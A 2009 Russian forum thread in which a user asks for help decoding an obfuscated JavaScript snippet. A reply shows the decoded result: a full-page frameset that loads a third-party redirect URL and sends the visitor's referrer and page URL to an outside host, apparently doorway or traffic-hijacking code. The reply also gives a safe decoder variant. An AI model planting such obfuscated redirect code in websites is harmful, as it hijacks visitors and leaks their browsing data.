Как еще можна раскодировать js скрипт

Тема в разделе "Другие языки", создана пользователем Juror, 2 дек 2009.

Статус темы:
Закрыта.
Модераторы: Цукер
  1. Juror

    Juror Постоялец

    Регистр.:
    3 сен 2009
    Сообщения:
    76
    Симпатии:
    35
    Большая челоловеческая просьба помочь раскодировать js скрипт:

    Код:
    
    function Decode(){var temp="",i,c=0,out="";var str="60!102!114!97!109!101!115!101!116!32!102!114!97!109!101!98!111!114!100!101!114!61!48!32!102!114!97!109!101!115!112!97!99!105!110!103!61!48!32!98!111!114!100!101!114!61!48!32!114!111!119!115!61!34!49!48!48!37!44!42!34!32!110!111!114!101!115!105!122!101!62!60!102!114!97!109!101!32!110!97!109!101!61!34!115!111!114!34!32!115!114!99!61!34!104!116!116!112!58!47!47!108!105!118!101!105!110!116!101!114!110!101!116!46!114!117!47!99!108!105!99!107!63!97!115!108!51!50!117!114!102!105!110!53!56!57!97!107!110!111!100!46!114!117!47!105!110!46!99!103!105!63!49!49!38!115!101!111!114!101!102!61!34!43!101!110!99!111!100!101!85!82!73!67!111!109!112!111!110!101!110!116!40!100!111!99!117!109!101!110!116!46!114!101!102!101!114!114!101!114!41!43!32!34!38!112!97!114!97!109!101!116!101!114!61!36!107!101!121!119!111!114!100!38!115!101!61!36!115!101!38!117!114!61!49!38!72!84!84!80!95!82!69!70!69!82!69!82!61!34!43!101!110!99!111!100!101!85!82!73!67!111!109!112!111!110!101!110!116!40!100!111!99!117!109!101!110!116!46!85!82!76!41!43!34!38!100!101!102!97!117!108!116!95!107!101!121!119!111!114!100!61!1079!1085!1072!1082!1086!1084!1089!1090!1074!1072!34!32!110!111!114!101!115!105!122!101!62!60!47!102!114!97!109!101!115!101!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
    Decode();
    
    
    У кого какие есть соображения??
     
  2. usasoft

    usasoft

    Регистр.:
    9 янв 2008
    Сообщения:
    200
    Симпатии:
    107
    <frameset frameborder=0 framespacing=0 border=0 rows="100%,*" noresize><frame name="sor" src="http://liveinternet.ru/click?asl32urfin589aknod.ru/in.cgi?11&seoref="+encodeURIComponent(document.referrer)+ "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=знакомства" noresize></frameset>


    Если таких кодов понатыкано много, делаем по аналогии:

    <form name='f1'>
    <textarea id='n1' name="Name" rows=25 cols=45></textarea>
    </form>
    <script>
    function Decode(){var temp="",i,c=0,out="";var str="60!102!114!97!109!101!115!101!116!32!102!114!97!109!101!98!111!114!100!101!114!61!48!32!102!114!97!109!101!115!112!97!99!105!110!103!61!48!32!98!111!114!100!101!114!61!48!32!114!111!119!115!61!34!49!48!48!37!44!42!34!32!110!111!114!101!115!105!122!101!62!60!102!114!97!109!101!32!110!97!109!101!61!34!115!111!114!34!32!115!114!99!61!34!104!116!116!112!58!47!47!108!105!118!101!105!110!116!101!114!110!101!116!46!114!117!47!99!108!105!99!107!63!97!115!108!51!50!117!114!102!105!110!53!56!57!97!107!110!111!100!46!114!117!47!105!110!46!99!103!105!63!49!49!38!115!101!111!114!101!102!61!34!43!101!110!99!111!100!101!85!82!73!67!111!109!112!111!110!101!110!116!40!100!111!99!117!109!101!110!116!46!114!101!102!101!114!114!101!114!41!43!32!34!38!112!97!114!97!109!101!116!101!114!61!36!107!101!121!119!111!114!100!38!115!101!61!36!115!101!38!117!114!61!49!38!72!84!84!80!95!82!69!70!69!82!69!82!61!34!43!101!110!99!111!100!101!85!82!73!67!111!109!112!111!110!101!110!116!40!100!111!99!117!109!101!110!116!46!85!82!76!41!43!34!38!100!101!102!97!117!108!116!95!107!101!121!119!111!114!100!61!1079!1085!1072!1082!1086!1084!1089!1090!1074!1072!34!32!110!111!114!101!115!105!122!101!62!60!47!102!114!97!109!101!115!101!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!') temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.f1.n1.value = out;}
    Decode();
    </script>
     
    Juror нравится это.
  3. Juror

    Juror Постоялец

    Регистр.:
    3 сен 2009
    Сообщения:
    76
    Симпатии:
    35
    Спасиб добрый человек. Выручил сильно.
    Твоя функция по правде сказать не пошла у меня, по зато нашел толковую прогу, которая и похлеще скрипты умеет декодировать.

    Вот только что б я глупых вопросов впреть менше задавал (по поводу кодирования j/скриптов) - ткни плз носом в умную книжку (Гугл не предлагать :D )

    Еше раз спс.
     
Статус темы:
Закрыта.